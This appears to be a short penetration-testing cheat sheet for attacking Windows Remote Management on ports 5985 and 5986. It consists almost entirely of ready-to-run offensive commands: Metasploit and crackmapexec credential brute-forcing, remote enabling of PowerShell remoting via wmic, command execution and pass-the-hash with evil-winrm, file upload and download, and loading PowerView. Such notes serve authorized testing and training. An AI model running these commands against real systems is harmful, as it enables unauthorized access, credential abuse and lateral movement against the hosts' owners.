WinRM 5985 5986
#Metasploit recon
use auxiliary/scanner/winrm/winrm_login set RHOSTS 10.11.1.13 set USERNAME DISCO set PASS_FILE /usr/share/wordlists/fasttrack.txt set DOMAIN disco.thinc run#Activate remotely using wmic
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"#Bruteforcing
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
#Just check a pair of credentials
# Username + Password + CMD command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm#Pass-the-hash with EvilWinRM
evil-winrm -u <username> -H <Hash> -i 10.10.10.10#evil-winrm assorted
#Connect with creds |
-s . argument will make scripts on attacking machine available for deployment
evil-winrm -i 10.10.10.10 -u redcliff -p “password123” -s .
#Upload and Download
upload local_filename (destination_filename)
download remote_filename (destination_filename)
#List all services showing if there your account has permissions over each one
services
#Menu listing loaded modules (default presented below)
menu
# You can load local PS1 scripts just by typing script name
# The scripts must be in the path set at -s argument
> Powerview.ps1
> menuLast updated